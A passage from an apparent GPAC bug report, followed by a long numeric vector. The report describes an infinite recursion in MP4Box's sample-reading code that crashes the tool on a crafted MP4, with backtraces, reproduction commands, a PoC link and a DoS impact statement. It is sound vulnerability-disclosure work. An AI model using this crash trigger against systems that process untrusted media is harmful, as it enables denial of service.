gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 #22 0x7f415a0a305a in Media_GetSample isomedia/media.c:662 #23 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #24 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 ... ``` looks like an infinite recursion ``` Media_GetSample isomedia/media.c:662 -> gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 -> gf_isom_get_sample_ex isomedia/isom_read.c:1916 -> Media_GetSample isomedia/media.c:662 ``` if compile without ASAN and run the same poc ``` ./configure --static-bin make ./MP4Box import -cat poc_segfault2.mp4 ``` there will be a segment fault ``` [HEVC] Error parsing NAL unit type 63 Track Importing L-HEVC - Width 1 Height 6 FPS 25000/1000 [HEVC] NAL Unit type 26 not handled - adding [HEVC] xPS changed but could not flush frames before signaling state change ! [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing NAL unit type 32 [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12 [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [HEVC] Error parsing NAL unit type 34 [HEVC] Error parsing NAL unit type 0 [HEVC] Error parsing NAL unit type 32 [HEVC] Error parsing NAL unit type 32 HEVC Import results: 7 samples (39 NALUs) - Slices: 0 I 0 P 1 B - 0 SEI - 0 IDR - 0 CRA HEVC L-HEVC Import results: Slices: 3 I 0 P 2 B HEVC Stream uses forward prediction - stream CTS offset: 6 frames HEVC Max NALU size is 106 - stream could be optimized by setting nal_length=1 Appending file /home/sumuchuan/Desktop/gpac_fuzz/cat_gpac/bin/gcc/out/default/crashes/160.mp4 No suitable destination track found - creating new one (type vide) Segmentation fault===== | (57/100) ``` Because it ran out of stack space, making rsp and rbp point to an unmapped memory, causing seg fault. backtrace atm ``` pwndbg> bt ... #16487 0x000000000054d599 in gf_isom_get_sample_ex () #16488 0x0000000000521d6d in gf_isom_nalu_sample_rewrite () #16489 0x0000000000570e13 in Media_GetSample () #16490 0x000000000054d599 in gf_isom_get_sample_ex () #16491 0x0000000000521d6d in gf_isom_nalu_sample_rewrite () #16492 0x0000000000570e13 in Media_GetSample () #16493 0x000000000054d599 in gf_isom_get_sample_ex () #16494 0x0000000000521d6d in gf_isom_nalu_sample_rewrite () #16495 0x0000000000570e13 in Media_GetSample () ... ``` # POC [poc-segfault2.zip](https://github.com/gpac/gpac/files/10253557/poc-segfault2.zip) # Impact Potentially causing DoS # Credit Xdchase --- end body ---
6,874
[ -0.031048443168401718, 0.014089640229940414, -0.022748364135622978, 0.010212854482233524, 0.01905944012105465, 0.01771024987101555, -0.029203981161117554, 0.028777021914720535, -0.007885929197072983, 0.026437288150191307, -0.012467197142541409, 0.0149777140468359, 0.04163702204823494, -0.002779501723125577, 0.04027075320482254, -0.006895384285598993, -0.01611342467367649, 0.012689215131103992, -0.0014420533552765846, 0.016847793012857437, 0.03173157572746277, -0.028742866590619087, -0.01808597519993782, 0.05266963690519333, -0.010972840711474419, 0.01904236152768135, -0.01183529756963253, 0.009828591719269753, -0.027120422571897507, -0.000032889169233385473, -0.0176931731402874, 0.014354354701936245, 0.003723080735653639, 0.018939891830086708, 0.06677635759115219, 0.014294580556452274, 0.05540217459201813, 0.07999499887228012, 0.008556254208087921, 0.005311367567628622, -0.004794747103005648, -0.0503469817340374, -0.016224434599280357, 0.026966717094182968, -0.010930145159363747, 0.04532594606280327, -0.009683425538241863, -0.005264401901513338, -0.04788769781589508, 0.0033473570365458727, 0.0169929601252079, -0.008009746670722961, -0.013022243045270443, -0.04413045942783356, 0.001375874737277627, -0.06339484453201294, 0.025497978553175926, 0.003082642564550042, 0.016847793012857437, 0.029699252918362617, 0.00227569043636322, 0.01784687675535679, 0.004179926589131355, 0.016335442662239075, 0.01638667844235897, 0.01705273427069187, 0.005413837265223265, 0.02464406192302704, 0.015353438444435596, 0.013500437140464783, -0.029477234929800034, -0.028332985937595367, 0.017795642837882042, 0.016770942136645317, 0.03603532165288925, -0.038836169987916946, 0.029477234929800034, 0.015361977741122246, 0.010340942069888115, 0.0326879657804966, -0.034515347331762314, 0.04313991591334343, -0.025907859206199646, 0.018683716654777527, 0.03507893532514572, -0.014824009500443935, -0.036820925772190094, -0.06476110965013504, -0.01613050326704979, -0.042490940541028976, 0.025378430262207985, 0.03130462020635605, 0.007945703342556953, 0.010716665536165237, -0.014704461209475994, 0.033132001757621765, 0.0013950878055766225, 0.005482150707393885, -0.07241220772266388, -0.0006954091368243098, -0.039143580943346024, -0.030963052064180374, 0.023363184183835983, 0.0005646530189551413, 0.0013513246085494757, 0.016215894371271133, -0.026881325989961624, 0.0021806920412927866, 0.037367433309555054, 0.15302203595638275, 0.01245011854916811, -0.0035544319543987513, 0.0010924808448180556, 0.02339734137058258, 0.004769129678606987, 0.0051704710349440575, -0.014883783645927906, 0.0029310721438378096, -0.029494313523173332, -0.012339108623564243, 0.007147290278226137, -0.016028033569455147, 0.0005849335575476289, 0.023858457803726196, -0.03685508295893669, 0.07234390079975128, -0.01822260208427906, -0.01216832548379898, -0.025805389508605003, -0.0170100387185812, -0.02093805931508541, -0.04853667691349983, -0.00013742735609412193, -0.023704752326011658, 0.03253426030278206, -0.007574249058961868, -0.015942640602588654, 0.03400299698114395, 0.006400112062692642, 0.012415961362421513, -0.03702586516737938, -0.011280251666903496, 0.025771232321858406, -0.00578529154881835, 0.005874952767044306, -0.004611155018210411, -0.007988398894667625, 0.0091710751876235, -0.02150164544582367, -0.009145457297563553, -0.008611759170889854, -0.024456199258565903, 0.028401298448443413, 0.03048485703766346, 0.04706793650984764, 0.011451034806668758, 0.013713916763663292, 0.023107009008526802, 0.01890573464334011, -0.005529116373509169, -0.01136564277112484, -0.026232348755002022, 0.0025446743238717318, -0.017624858766794205, -0.014917939901351929, -0.03695755451917648, 0.03982671722769737, -0.020579414442181587, 0.004363518673926592, 0.019520556554198265, -0.0032427520491182804, 0.011989003047347069, 0.02069896273314953, 0.026317739859223366, -0.031219227239489555, -0.03437872231006622, 0.02083558961749077, 0.04682883992791176, -0.01251843199133873, -0.017863955348730087, -0.009820052422583103, -0.0005056793452240527, -0.011732827872037888, 0.008803890086710453, 0.02490023709833622, 0.01123755518347025, 0.007851772010326385, -0.021877368912100792, 0.011109467595815659, -0.0021390635520219803, 0.011109467595815659, 0.013064938597381115, 0.0346861332654953, 0.0028798370622098446, 0.04119298607110977, -0.014960636384785175, -0.017778564244508743, -0.010725204832851887, -0.009333319030702114, 0.001875416492111981, -0.008684341795742512, -0.02068188413977623, -0.02761569432914257, 0.00890636071562767, -0.03794809803366661, -0.003966446965932846, -0.021433331072330475, 0.0353521890938282, 0.025395508855581284, -0.025480899959802628, -0.04232015460729599, -0.053933434188365936, 0.006976506672799587, -0.0066007827408611774, -0.008598949760198593, 0.006698983255773783, -0.019366851076483727, 0.0005470409523695707, 0.01143395621329546, -0.02027200348675251, 0.03907527029514313, -0.005447993986308575, 0.028537925332784653, -0.022765442728996277, -0.00795851182192564, -0.023021617904305458, -0.016864871606230736, -0.014243345707654953, -0.005319906398653984, 0.004384866915643215, 0.04515516012907028, 0.0018626077799126506, -0.01708689145743847, 0.007838963530957699, 0.02056233584880829, -0.016788018867373466, -0.015481526032090187, 0.0058920313604176044, 0.010076227597892284, 0.0029118589591234922, -0.004427562467753887, 0.04378889501094818, -0.02855500392615795, 0.01847877725958824, -0.01216832548379898, 0.030911816284060478, -0.010571499355137348, -0.014832548797130585, -0.013218644075095654, 0.011527887545526028, -0.014303119853138924, -0.007851772010326385, 0.012868537567555904, -0.013372349552810192, -0.015028949826955795, 0.023311950266361237, 0.02831590734422207, 0.018171366304159164, -0.03548881411552429, -0.03480568155646324, 0.01625005155801773, 0.004675198812037706, -0.035830382257699966, -0.011647435836493969, 0.0004968732828274369, -0.0052259755320847034, 0.012979547493159771, 0.016301287338137627, -0.004918565507978201, -0.02529303915798664, 0.02788894809782505, 0.00024536787532269955, -0.041705336421728134, -0.0353521890938282, -0.016634315252304077, -0.013628524728119373, 0.01102407556027174, -0.003966446965932846, 0.02831590734422207, 0.021535800769925117, 0.016506226733326912, 0.011673053726553917, -0.033695586025714874, 0.02203107438981533, 0.004952721763402224, -0.010784978978335857, 0.020032906904816628, -0.007369308732450008, -0.04296913370490074, 0.010255550034344196, 0.008218957111239433, 0.02910151146352291, -0.07521305978298187, 0.03641104698181152, 0.018581246957182884, 0.015413212589919567, 0.005221705883741379, 0.02626650407910347, -0.008889282122254372, -0.0007471778662875295, -0.0017612050287425518, 0.010938684456050396, 0.0021049068309366703, 0.0018775513162836432, -0.06278002262115479, 0.00415003951638937, -0.03798225522041321, 0.009828591719269753, -0.026351897045969963, 0.009649268351495266, 0.048365890979766846, -0.05820302292704582, -0.017744407057762146, 0.008043903857469559, -0.005187549162656069, -0.010878910310566425, -0.013150330632925034, -0.011877994053065777, -0.01671970635652542, 0.014465363696217537, -0.012672136537730694, 0.004182061180472374, -0.034908149391412735, 0.024131711572408676, 0.02300453931093216, -0.003787124529480934, -0.017172282561659813, 0.04368642345070839, -0.06479526311159134, 0.027598615735769272, 0.024439120665192604, -0.002000301843509078, 0.0007642562268301845, -0.05485566705465317, -0.010153080336749554, -0.017001498490571976, -0.01771024987101555, -0.009469945915043354, 0.003949368838220835, 0.006613591685891151, -0.016181739047169685, 0.010631273500621319, 0.016497688367962837, 0.005217436235398054, -0.02121131308376789, 0.003545892657712102, 0.008402548730373383, -0.002341869054362178, 0.02611280046403408, 0.013671220280230045, 0.0016662066336721182, 0.05229391157627106, 0.018410462886095047, 0.02394384890794754, 0.025668762624263763, -0.0057682134211063385, -0.0032256736885756254, -0.007920085452497005, 0.010409255512058735, -0.01660015806555748, 0.006216519977897406, -0.010691048577427864, -0.017394300550222397, 0.01217686478048563, 0.0003375642991159111, 0.010699586942791939, 0.006677635479718447, -0.012065855786204338, -0.005038113798946142, -0.006874036509543657, -0.027974339202046394, 0.04887824133038521, -0.04710209369659424, 0.01110092829912901, -0.02259465865790844, -0.027837712317705154, 0.03644520416855812, -0.01156204380095005, -0.04474528133869171, 0.01718936115503311, -0.033798057585954666, 0.022816678509116173, 0.05335276946425438, -0.03239763155579567, -0.00018666104006115347, 0.014661764726042747, -0.0306214839220047, 0.04717040807008743, -0.016975881531834602, -0.025122255086898804, -0.02937476523220539, 0.047682758420705795, -0.03193651884794235, -0.04556504264473915, 0.00007972121238708496, 0.024422042071819305, -0.027035031467676163, -0.024302493780851364, -0.000322620733641088, -0.04522347450256348, 0.03446411341428757, 0.004393405746668577, -0.010648352093994617, 0.025241803377866745, -0.025890780612826347, 0.04908318445086479, 0.019213145598769188, -0.017744407057762146, 0.012552588246762753, 0.008453784510493279, 0.030279917642474174, -0.026181112974882126, -0.039246052503585815, -0.004995417781174183, 0.032038986682891846, 0.0176931731402874, 0.010682509280741215, 0.024661140516400337, -0.03323447331786156, -0.0018860904965549707, -0.036650143563747406, -0.00461969431489706, -0.0015221080975607038, 0.025771232321858406, 0.01931561529636383, 0.028213437646627426, -0.018051818013191223, 0.010861831717193127, 0.012629440985620022, -0.0018999666208401322, 0.020886823534965515, 0.003883190220221877, -0.008556254208087921, -0.004271722864359617, -0.020237846300005913, -0.032295163720846176, -0.04939059168100357, -0.04003165662288666, -0.02573707513511181, -0.025190569460392, -0.03101428598165512, 0.044267088174819946, 0.01244157925248146, 0.010554421693086624, 0.013739533722400665, -0.050278667360544205, -0.04853667691349983, -0.027000874280929565, 0.024985628202557564, -0.012424500659108162, -0.027171658352017403, 0.0367867685854435, 0.018581246957182884, -0.006605052389204502, 0.004393405746668577, 0.010921605862677097, 0.004576998297125101, -0.018410462886095047, 0.04819510877132416, 0.022133544087409973, -0.005341254640370607, 0.034361641854047775, 0.016711167991161346, -0.005507768597453833, 0.021160077303647995, 0.01875203102827072, -0.006246407050639391, -0.02136501856148243, 0.0015487930504605174, -0.016352521255612373, 0.0008571197977289557, 0.008364122360944748, 0.02437080815434456, 0.00458553759381175, 0.013372349552810192, 0.010588577948510647, 0.008048173040151596, -0.02300453931093216, -0.012433039955794811, -0.05591452494263649, -0.01102407556027174, 0.006835610140115023, -0.014798391610383987, 0.0244732778519392, 0.006344607565551996, -0.007014933042228222, -0.027684008702635765, -0.003042081370949745, 0.027393676340579987, -0.010067688301205635, 0.018734952434897423, 0.012706293724477291, -0.043481484055519104, -0.023773064836859703, 0.008889282122254372, -0.013269878923892975, -0.02529303915798664, 0.005507768597453833, 0.021194234490394592, 0.013150330632925034, 0.00626348564401269, -0.0306044053286314, -0.0019437299342826009, 0.0022265901789069176, 0.030963052064180374, -0.03921189531683922, -0.008616028353571892, 0.020647726953029633, -0.0056998999789357185, -0.04532594606280327, -0.01755654625594616, -0.019913358613848686, 0.014533677138388157, -0.02134793996810913, -0.01687341183423996, -0.02121131308376789, 0.01810305193066597, -0.007036280818283558, 0.03890448436141014, 0.005964614450931549, 0.0032363475766032934, -0.02476361021399498, 0.016634315252304077, 0.02261173725128174, 0.012475735507905483, 0.014747156761586666, 0.00815491285175085, 0.005401028785854578, 0.02232140488922596, -0.019623026251792908, -0.0021187830716371536, -0.008394009433686733, -0.01183529756963253, 0.023755988106131554, -0.018734952434897423, -0.018273836001753807, -0.004094535019248724, 0.03593285009264946, -0.002751749474555254, -0.03429333120584488, -0.022099386900663376, 0.0666738823056221, -0.030143290758132935, 0.029016120359301567, -0.03127046301960945, 0.043754737824201584, 0.012885616160929203, 0.0258395466953516, -0.002683436032384634, 0.0033921876456588507, 0.030126212164759636, -0.004032625816762447, 0.013346731662750244, 0.009393093176186085, 0.027239970862865448, 0.01550714299082756, -0.003101855516433716, 0.024968549609184265, 0.013082017190754414, 0.016198815777897835, 0.005759674124419689, 0.009598033502697945, -0.009683425538241863, -0.0012061585439369082, -0.012740449979901314, -0.008940516971051693, -0.013543132692575455, 0.029887115582823753, -0.031065521761775017, -0.014414128847420216, -0.0028969154227524996, 0.007091785315424204, 0.010503185912966728, -0.030997207388281822, -0.007868850603699684, 0.016591617837548256, -0.001273404574021697, -0.008812429383397102, -0.018171366304159164, -0.030279917642474174, 0.014397050254046917, -0.03702586516737938, -0.011784062720835209, 0.023380262777209282, 0.01272337231785059, -0.018717873841524124, -0.0026514141354709864, 0.008697150275111198, -0.0021742875687777996, -0.015814553946256638, 0.006139667239040136, -0.013961552642285824, -0.03021160326898098, -0.032448869198560715, 0.004141500219702721, 0.0021700181532651186, -0.009854208678007126, -0.010434872470796108, -0.011527887545526028, -0.012902694754302502, -0.015131419524550438, 0.03145832195878029, -0.020630648359656334, -0.04819510877132416, -0.02423418127000332, 0.02083558961749077, 0.01987920142710209, 0.00897467415779829, -0.032568417489528656, 0.038699544966220856, 0.02501978538930416, 0.027444910258054733, 0.056802596896886826, -0.011442495509982109, 0.01190361101180315, 0.004361384082585573, 0.03034823015332222, -0.0006361685809679329, 0.009828591719269753, 0.033695586025714874, 0.017436997964978218, -0.04662390053272247, 0.03410546854138374, -0.017411379143595695, 0.0032726391218602657, 0.017744407057762146, -0.008453784510493279, -0.030809346586465836, -0.011758444830775261, -0.009153996594250202, -0.03641104698181152, 0.007476048544049263, 0.003057024907320738, -0.047546129673719406, -0.030382387340068817, 0.0306214839220047, 0.04372058063745499, -0.01863248087465763, -0.017197899520397186, 0.0045172241516411304, 0.020716041326522827, 0.022953305393457413, -0.005960344802588224, 0.0007642562268301845, -0.0251564122736454, 0.011536426842212677, 0.013824925757944584, -0.0011687997030094266, 0.0027816365472972393, 0.022680051624774933, -0.01958886906504631, -0.014388510957360268, -0.015165576711297035, 0.021723663434386253, 0.016369599848985672, -0.01987920142710209, 0.06684467196464539, 0.005883492063730955, 0.0007824019994586706, -0.024849001318216324, -0.010050609707832336, -0.05974007397890091, 0.0045044152066111565, 0.0015882867155596614, -0.0065580871887505054, -0.02042570896446705, -0.0156608484685421, 0.005516307428479195, -0.0016854198183864355, 0.025634605437517166, -0.006818532012403011, 0.0027069186326116323, 0.028213437646627426, 0.0020269867964088917, -0.016779480502009392, -0.013987169601023197, 0.013508976437151432, 0.002954554744064808, 0.0026578183751553297, -0.010349481366574764, -0.013773690909147263, -0.002672762144356966, 0.009691964834928513, 0.018956970423460007, -0.012953929603099823, 0.010887449607253075, 0.008581872098147869, -0.01847877725958824, -0.021552879363298416, -0.02573707513511181, 0.01625005155801773, 0.018444620072841644, 0.029443077743053436, 0.03277335688471794, 0.02664222940802574, -0.022628815844655037, 0.009119839407503605, 0.0022009725216776133, 0.0064214603044092655, 0.008829507976770401, -0.019759653136134148, 0.002824332332238555, -0.010682509280741215, -0.026317739859223366, 0.03159495070576668, 0.011647435836493969, -0.009598033502697945, -0.004478797782212496, 0.012211021035909653, -0.004246104974299669, 0.014456824399530888, 0.025549214333295822, -0.01123755518347025, 0.004700816236436367, 0.02597617357969284, -0.018564168363809586, 0.006993584800511599, -0.017138125374913216, 0.003562971018254757, 0.016625775024294853, -0.004606885369867086, -0.024439120665192604, -0.022082308307290077, -0.03562544286251068, 0.0037999332416802645, -0.0013790768571197987, 0.003733754623681307, -0.00748885702341795, 0.008803890086710453, 0.010067688301205635, 0.0021273221354931593, -0.04812679439783096, 0.0435156412422657, 0.01661723665893078, -0.029630940407514572, -0.009213770739734173, 0.018188444897532463, -0.009410171769559383, -0.011784062720835209, 0.024182945489883423, 0.006344607565551996, -0.01224517822265625, 0.020784353837370872, -0.011510808952152729, 0.0019597408827394247, -0.02203107438981533, 0.02080143243074417, 0.008449514396488667, -0.033268630504608154, 0.013594367541372776, 0.007860311307013035, 0.0449160635471344, 0.02503686398267746, -0.03185112401843071, -0.02392677031457424, -0.018820343539118767, 0.021672427654266357, -0.010281167924404144, 0.0038917292840778828, -0.016224434599280357, 0.005588890518993139, 0.017659015953540802, -0.010093306191265583, -0.0034967924002557993, 0.005490690004080534, -0.009282084181904793, -0.013167409226298332, -0.03186820447444916, 0.02587370201945305, -0.023243635892868042, 0.02993835136294365, -0.016788018867373466, -0.0028563542291522026, -0.004871599841862917, 0.018171366304159164, -0.03565960004925728, -0.012467197142541409, 0.03955346345901489, -0.010639812797307968, 0.015208272263407707, -0.0503128245472908, 0.02203107438981533, -0.03511309251189232, 0.01537905540317297, -0.0034092660062015057, -0.018956970423460007, 0.018068896606564522, 0.002337599406018853, 0.005627316888421774, 0.010844753123819828, -0.006630669813603163, -0.00618663290515542, 0.038597073405981064, -0.018717873841524124, -0.015942640602588654, -0.008957595564424992, -0.01177552342414856, 0.01210855133831501, -0.03699170798063278, -0.02964801900088787, 0.016651391983032227, -0.009487024508416653, -0.030519014224410057, -0.02817928045988083, -0.03624026104807854, -0.01986212283372879, -0.018956970423460007, -0.0036462279967963696, -0.030296996235847473, 0.006792914588004351, 0.005866413936018944, 0.016361061483621597, 0.02624942734837532, -0.02218477800488472, 0.00311466446146369, 0.0022799598518759012, 0.01861540414392948, 0.003620610572397709, -0.03101428598165512, 0.00783042423427105, 0.0013673355570062995, 0.016907569020986557, 0.010127462446689606, -0.055436328053474426, 0.00897467415779829, -0.0021508049685508013, 0.006156745832413435, 0.011536426842212677, 0.020494021475315094, -0.0025105176027864218, -0.008607489056885242, -0.01839338429272175, -0.011382721364498138, 0.02271420694887638, 0.011476652696728706, 0.02638605423271656, -0.0028051191475242376, 0.0112290158867836, -0.014294580556452274, 0.017368683591485023, -0.004316553473472595, -0.0251734908670187, -0.0030207333620637655, -0.02899904176592827, -0.003422074718400836, -0.02177489921450615, -0.026488523930311203, -0.005260132253170013, 0.003035676898434758, -0.01096430141478777, 0.02503686398267746, 0.017044194042682648, -0.001160260522738099, 0.03350772708654404, -0.026761777698993683, 0.001580814947374165, 0.00421835295855999, 0.0004640508268494159, 0.04173948988318443, -0.0032769087702035904, 0.037879783660173416, 0.00768525805324316, -0.02968217432498932, -0.017163744196295738, 0.015088723972439766, 0.039792560040950775, -0.010793518275022507, -0.058988627046346664, -0.01298808678984642, -0.027120422571897507, -0.0051235053688287735, -0.0251734908670187, -0.011604740284383297, 0.03145832195878029, -0.020647726953029633, -0.012766067869961262, -0.010323863476514816, -0.001142114750109613, -0.010332402773201466, 0.01757362298667431, 0.009751738980412483, 0.04040737822651863, -0.009572416543960571, -0.004365653730928898, -0.010938684456050396, -0.01933269388973713, -0.002881971886381507, -0.030245760455727577, -0.029733410105109215, 0.0023397342301905155, -0.005106427241116762, -0.010716665536165237, -0.04122713953256607, -0.012424500659108162, 0.020494021475315094, 0.04747781902551651, -0.009085683152079582, -0.016557462513446808, -0.009196692146360874, -0.022884991019964218, -0.016412295401096344, -0.00618663290515542, -0.0038533031474798918, -0.021569957956671715, -0.019008206203579903, -0.03214145824313164, 0.03781146928668022, -0.010238471440970898, -0.005635856185108423, -0.014695921912789345, 0.0024080476723611355, 0.013500437140464783, -0.024182945489883423, -0.04522347450256348, -0.018974049016833305, -0.019810887053608894, -0.03181697055697441, 0.01591702364385128, 0.000019680132027133368, 0.05482150986790657, 0.007318073883652687, -0.002802984556183219, 0.01613050326704979, 0.03410546854138374, -0.008432435803115368, -0.021672427654266357, -0.015635231509804726, -0.008137834258377552, -0.02206522971391678, 0.005452263634651899, -0.0038276854902505875, -0.00768525805324316, -0.009401632472872734, 0.010998458601534367, 0.022953305393457413, -0.00876973383128643, -0.01613050326704979, 0.022355562075972557, -0.012620901688933372, -0.018888656049966812, -0.0014014922780916095, 0.02069896273314953, 0.03005789965391159, 0.004542841576039791, -0.010016453452408314, 0.006131128408014774, 0.0064769648015499115, -0.010537343099713326, 0.008509288541972637, -0.03781146928668022, -0.053660180419683456, -0.02011829800903797, -0.046589743345975876, -0.006767296697944403, -0.004243970382958651, -0.003449826966971159, -0.02204815112054348, -0.0014730078401044011, 0.0009878758573904634, 0.029750488698482513, 0.005571812391281128, 0.006861227564513683, -0.02177489921450615, -0.007565709762275219, 0.019964592531323433, 0.010921605862677097, -0.03750406205654144, 0.004130826331675053, -0.018837422132492065, -0.015524221584200859, 0.010562960058450699, -0.015695005655288696, -0.00041334948036819696, 0.038153037428855896, -0.0006521795294247568, 0.03282459080219269, -0.018307993188500404, -0.03996334224939346, -0.021740742027759552, -0.010238471440970898, -0.01543882954865694, -0.007463239599019289, 0.047546129673719406, -0.047546129673719406, 0.010972840711474419, -0.006485504098236561, 0.00043149522389285266, 0.024968549609184265, -0.014687382616102695, -0.000713554909452796, 0.04409630224108696, 0.010571499355137348, 0.011758444830775261, -0.04167117923498154, 0.0026983795687556267, 0.009265005588531494, 0.01875203102827072, -0.02437080815434456, -0.011049693450331688, -0.02841837704181671, -0.02204815112054348, -0.015874328091740608, 0.015712084248661995, 0.02273128554224968, -0.0005529116606339812, -0.00910276174545288, 0.011382721364498138, 0.003671845654025674, -0.022919148206710815, -0.030553171411156654, -0.022884991019964218, 0.004696546588093042, 0.005371141713112593, 0.013295496813952923, 0.019127754494547844, -0.0231411661952734, 0.006122589111328125, 0.030706876888871193, 0.036376889795064926, 0.04245678335428238, -0.012766067869961262, 0.0008565860916860402, -0.010861831717193127, -0.015199732966721058, 0.01986212283372879, 0.031099678948521614, -0.015532760880887508, 0.009128378704190254, 0.003439153078943491, 0.022133544087409973, 0.021433331072330475, 0.01837630569934845, -0.0004026755050290376, 0.010170157998800278, -0.002431530272588134, -0.014149414375424385, 0.01984504424035549, -0.03726496174931526, -0.013022243045270443, 0.01847877725958824, 0.03770900145173073, 0.002591639757156372, -0.016412295401096344, -0.025822468101978302, -0.009580954909324646, 0.017291830852627754, 0.01810305193066597, 0.019810887053608894, -0.00010013517749030143, -0.004910026211291552, 0.028794100508093834, -0.006587974261492491, 0.03159495070576668, -0.02150164544582367, -0.0058792224153876305, -0.000525693001691252, -0.01143395621329546, -0.0007231614436022937, 0.018137209117412567, -0.027239970862865448, -0.010033532045781612, -0.02216770127415657, 0.015080184675753117, -0.04228599742054939, -0.020323239266872406, -0.031902361661195755, -0.01190361101180315, 0.013491897843778133, 0.008078060112893581, 0.010417794808745384, 0.005029574502259493, 0.01272337231785059, -0.0009019504650495946, -0.028777021914720535, 0.018154287710785866, -0.024165866896510124, 0.018410462886095047, -0.021399173885583878, -0.005106427241116762, -0.006622130982577801, -0.010238471440970898, -0.026966717094182968, -0.005529116373509169, 0.008325695991516113, -0.0558120533823967, 0.002188163809478283, 0.00461969431489706, -0.02134793996810913, 0.023380262777209282, -0.011997542344033718, -0.00041388318641111255, -0.016361061483621597, -0.0016171063762158155, -0.02406339719891548, -0.019947513937950134, 0.016668470576405525, 0.009077143855392933, 0.09099345654249191, 0.005644395016133785, -0.02015245519578457, -0.014917939901351929, 0.011083850637078285, -0.0058578746393322945, 0.023585204035043716, 0.013594367541372776, 0.006750218570232391, 0.015353438444435596, 0.03931436687707901, -0.0012189673725515604, -0.011058232747018337, 0.0027154579292982817, -0.004299474880099297, 0.0025852355174720287, -0.024302493780851364, -0.007569979410618544, 0.012663598172366619, 0.019161909818649292, 0.014072561636567116, 0.004487337078899145, 0.01917898841202259, -0.005166201386600733, 0.014490981586277485, -0.02039155177772045, -0.005605969112366438, -0.03606947883963585, -0.03753821551799774, -0.01782980002462864, -0.01122047659009695, -0.02626650407910347, -0.013466279953718185, 0.006972237024456263, 0.017112508416175842, 0.00001884622724901419, 0.005490690004080534, 0.005042383447289467, -0.008129294961690903, -0.021587036550045013, 0.010972840711474419, 0.009922522120177746, -0.013884699903428555, 0.008795350790023804, 0.00031835114350542426, -0.01849585399031639, 0.03644520416855812, 0.0002681835030671209, -0.010434872470796108, -0.008543445728719234, 0.0030506206676363945, -0.02694963850080967, 0.017898112535476685, 0.013645603321492672, -0.009299162775278091, 0.021416252478957176, -0.026488523930311203, -0.01503748819231987, -0.0007397060981020331, -0.027530303224921227, 0.0005641193129122257, 0.010682509280741215, 0.003456231439486146, 0.014320197515189648, -0.001014560810290277, -0.014115258120000362, -0.006272024475038052, -0.008065251633524895, -0.0002881971886381507, 0.018888656049966812, 0.018461698666214943, -0.022953305393457413, -0.00005346991747501306, 0.009384553879499435, -0.0119121503084898, 0.014533677138388157, -0.00031087937531992793, 0.0006078825681470335, -0.027274128049612045, -0.02134793996810913, 0.015131419524550438, 0.021006371825933456, 0.014106718823313713, 0.021177155897021294, -0.027530303224921227, 0.011382721364498138, -0.00897467415779829, 0.02257758006453514, 0.008863664232194424, -0.011451034806668758, 0.005221705883741379, -0.0112290158867836, 0.0009617246687412262, 0.018547089770436287, -0.019230224192142487, -0.000508614641148597, 0.00012061585584888235, -0.027923105284571648, -0.015327820554375648, -0.0051235053688287735, 0.008180530741810799, -0.008283000439405441, 0.028059732168912888, 0.002382430015131831, -0.008248844183981419, -0.0037486981600522995, -0.0011282386258244514, 0.0007210266776382923, 0.014021326787769794, 0.001562669174745679, -0.029323529452085495, -0.018700795248150826, 0.0012403152650222182, -0.02150164544582367, -0.014926479198038578, 0.022765442728996277, 0.013807847164571285, 0.001107958029024303, 0.002988711465150118, -0.013739533722400665, 0.0003327610029373318, -0.0027602885384112597, 0.0326879657804966, -0.025105176493525505, 0.011177781037986279, 0.0033409525640308857, 0.0027496146503835917, -0.007189985830336809, 0.03931436687707901, 0.029016120359301567, 0.00762548390775919, 0.007505935616791248, -0.017095429822802544, 0.0025895051658153534, 0.03296121954917908, -0.022013995796442032, 0.027701087296009064, 0.00836839247494936, 0.009521180763840675, 0.0018487315392121673, -0.009598033502697945, 0.026044486090540886, 0.017898112535476685, -0.0003220870275981724, 0.010451951064169407, -0.017881033942103386, 0.014721538871526718, 0.00438913656398654, 0.004807556048035622, -0.0010818068403750658, 0.002431530272588134, -0.021142998710274696, 0.0044489107094705105, 0.045257631689310074, 0.023448577150702477, -0.0021241200156509876, 0.011442495509982109, -0.018717873841524124, -0.004743512254208326, -0.006318990141153336, 0.0183592289686203, 0.021399173885583878, 0.03048485703766346, -0.017240596935153008, -0.014499520882964134, 0.004927104339003563, -0.017727328464388847, -0.04720456525683403, -0.019947513937950134, -0.005507768597453833, 0.004645311739295721, 0.017308909446001053, -0.0004563122056424618, -0.0007274310337379575, 0.023311950266361237, 0.011604740284383297, -0.002348273294046521, -0.0070875161327421665, 0.03197067603468895, -0.022748364135622978, -0.01781272143125534, 0.043754737824201584, -0.012731911614537239, 0.01102407556027174, 0.01999874971807003, -0.008949056267738342, 0.009265005588531494, 0.0011036884970963001, -0.020101219415664673, 0.02828175015747547, 0.01116070244461298, 0.027137501165270805, -0.025275960564613342, 0.016352521255612373, -0.016147581860423088, -0.015677927061915398, -0.012757528573274612, -0.008829507976770401, -0.004935643635690212, 0.029579704627394676, -0.006622130982577801, -0.00571697810664773, -0.015088723972439766, 0.009265005588531494, 0.02013537660241127, -0.036274418234825134, -0.01890573464334011, -0.0016779480502009392, -0.015319281257689, -0.02220185659825802, -0.013133252039551735, 0.021962760016322136, 0.024797767400741577, 0.015216811560094357, 0.018034739419817924, 0.009521180763840675, -0.004875869490206242, -0.025105176493525505, 0.004508684854954481, 0.02655683644115925, -0.03022868186235428, -0.0026919750962406397, 0.006336068268865347, 0.0025340004358440638, -0.005904840305447578, -0.0002967363689094782, 0.03658182919025421, -0.02642020955681801, 0.008855124935507774, 0.010469029657542706, -0.009452867321670055, 0.0058792224153876305, 0.0050124963745474815, 0.02339734137058258, -0.006327529437839985, -0.024404965341091156, -0.016104886308312416, -0.01878618635237217, -0.013551671989262104, -0.005106427241116762, -0.001915977569296956, -0.007851772010326385, -0.028640395030379295, 0.00835985317826271, -0.008522097021341324, -0.00007998805813258514, 0.00404756935313344, 0.008206147700548172, -0.005473611876368523, 0.035181403160095215, -0.0009718649671413004, 0.016514766961336136, 0.0001115429840865545, -0.011135085485875607, -0.0005785291432403028, 0.04413045942783356, 0.010870371013879776, -0.004350710194557905, -0.00036078019184060395, 0.023089932277798653, 